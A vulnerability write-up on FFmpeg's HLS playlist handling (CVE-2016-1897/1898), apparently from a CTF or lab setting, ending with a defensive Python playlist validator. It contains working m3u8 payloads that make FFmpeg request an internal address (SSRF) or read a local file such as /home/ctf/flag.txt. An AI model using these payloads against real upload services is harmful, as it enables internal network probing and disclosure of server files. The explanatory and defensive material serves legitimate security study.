
Title: ffmpeg arbitrary file read vulnerability/SSRF vulnerability


ffmpeg arbitrary file read vulnerability / SSRF vulnerability (CVE-2016-1897/CVE-2016-1898)

In FFmpeg 2.x, improper handling of HTTP Live Streaming (HLS) m3u8 playlist files leads to an SSRF vulnerability and an arbitrary file read vulnerability. The vulnerability is triggered when a website allows users to upload multimedia files and processes them with FFmpeg.

This vulnerability has two CVE numbers, CVE-2016-1897 and CVE-2016-1898. The difference between them is how many lines of the target file can be read: CVE-2016-1897 can only read the first line of the file, while CVE-2016-1898 can read any line of the file. The underlying principle is the same, so they are analyzed together here.

HLS(HTTP Live Streaming)

Since the vulnerability occurs when parsing HLS streaming files, we must first understand HLS.

HLS (HTTP Live Streaming) is a streaming protocol based on HTTP, developed by Apple, and used mostly on PCs and iPhones. Its basic principle is to split a video stream into many small .ts segment files, which the client then downloads over HTTP one piece at a time. When starting a new streaming session, the client first downloads an m3u8 (playlist) file, which describes all the data of the HLS session.

http://pl.youku.com/playlist/m3u8?vid=340270152type=3gphdts=1462714824keyframe=0ep=dSaSGE6MUssC5ybeiz8bYiXiIiZdXP0O9h2CgdNnAtQnS%2Bm2sid=746271452251312590fabtoken=3319ctype=12ev=1oip=3395898128

This is the m3u8 file of a Youku video; its contents are as follows:

#EXTM3U
#EXT-X-TARGETDURATION:6
#EXT-X-VERSION:2
#EXTINF:6,
http://183.60.145.83/69777D60D183E7FE8D0BC25A4/030002010056208D059E4E15049976CD642E01-C8E5-706F-DC6D-375DE0DA5A1E.flv.ts?ts_start=0ts_end=5.9ts_seg_no=0ts_keyframe=1
#EXTINF:0,
http://183.60.145.83/69777D60D183E7FE8D0BC25A4/030002010056208D059E4E15049976CD642E01-C8E5-706F-DC6D-375DE0DA5A1E.flv.ts?ts_start=5.9ts_end=6.367ts_seg_no=1ts_keyframe=1
#EXT-X-ENDLIST

Analysis:

The #EXTM3U tag is the m3u8 file header, and it must be the first line of the file.

#EXT-X-TARGETDURATION indicates the length of the entire media; here it is 6 seconds.

#EXT-X-VERSION:2 is an optional tag.

#EXTINF:6, indicates the length of this TS segment file.

#EXT-X-ENDLIST is equivalent to the end of the file.

These are the most basic m3u8 tags. The problem is that when FFmpeg requests the TS segment files, it does not validate the segment addresses inside the playlist; since we can forge an m3u8 file, FFmpeg will directly request whatever address the playlist contains.

Vulnerability principle

SSRF vulnerability:

Parse the following multimedia file directly with FFmpeg:

#EXTM3U
#EXT-X-MEDIA-SEQUENCE:0
#EXTINF:10.0,
http://192.168.123.100:8080/1.html
#EXT-X-ENDLIST

(One of #EXT-X-MEDIA-SEQUENCE or #EXT-X-TARGETDURATION must be present. The former is the sequence number of the TS segment file; if it is removed, FFmpeg reports an error: invalid file.)


ffmpeg -i test.m3u8 test.mp4 (the .m3u8 extension can also be changed to another suffix; FFmpeg will still automatically recognize the file as an HLS stream)


The following playlists can read a file from the server:


#EXTM3U
#EXT-X-TARGETDURATION:1
#EXTINF:1,
/home/ctf/flag.txt
#EXT-X-ENDLIST

#EXTM3U
#EXT-X-PLAYLIST-TYPE:VOD
#EXT-X-TARGETDURATION:1
#EXT-X-VERSION:3
#EXT-X-MEDIA-SEQUENCE:0
#EXTINF:10.0,
file:///home/ctf/flag.txt
#EXT-X-ENDLIST
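Since the root cause is that the segment addresses in an uploaded playlist are never validated, the natural upload-side defense is to audit them before the file reaches FFmpeg. The following is an added example written for this post (not FFmpeg's own code and not part of the original); it assumes a hypothetical `audit_playlist` helper that the upload handler calls, allows only http/https segment URIs to public hosts, and rejects the bare-path, file:// and internal-address playlists shown above.

```python
import ipaddress
from urllib.parse import urlsplit

# Hypothetical upload-side check (added example, not FFmpeg's own code): audit a
# user-supplied HLS playlist before it is handed to ffmpeg, allowing only
# http/https segment URIs that point at public hosts.


def segment_uris(playlist_text):
    """Yield the segment URI lines of an m3u8 playlist: every non-empty line
    that is not a #-tag, which is how the HLS parser picks up segment targets."""
    for raw in playlist_text.splitlines():
        line = raw.strip()
        if line and not line.startswith("#"):
            yield line


def check_uri(uri):
    """Return None if the segment URI is acceptable, otherwise a reason string."""
    parts = urlsplit(uri)
    if parts.scheme not in ("http", "https"):
        # Covers bare paths such as /home/ctf/flag.txt and file:// URIs.
        return "non-http scheme or bare path: %r" % uri
    host = parts.hostname
    if not host or host.lower() == "localhost":
        return "missing or local host: %r" % uri
    try:
        addr = ipaddress.ip_address(host)
    except ValueError:
        # A DNS name: the caller must resolve it and re-check the resulting
        # address (assumption: resolution is done by the caller, not here).
        return None
    if not addr.is_global:
        # Private, loopback, link-local, multicast and reserved ranges.
        return "internal address: %r" % uri
    return None


def audit_playlist(playlist_text):
    """Return the reasons for rejecting the playlist; an empty list means it passed."""
    return [r for r in (check_uri(u) for u in segment_uris(playlist_text)) if r]


if __name__ == "__main__":
    # Constructed sample mirroring the SSRF playlist from the post.
    sample = "#EXTM3U\n#EXT-X-MEDIA-SEQUENCE:0\n#EXTINF:10.0,\n" \
             "http://192.168.123.100:8080/1.html\n#EXT-X-ENDLIST\n"
    for reason in audit_playlist(sample):
        print("reject:", reason)
```

As defense in depth, FFmpeg's own `-protocol_whitelist` option (for example `-protocol_whitelist http,https,tcp,tls`) restricts which protocols a demuxer may open, so a playlist pointing at `file:` or a bare path fails even if the upload check is bypassed.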
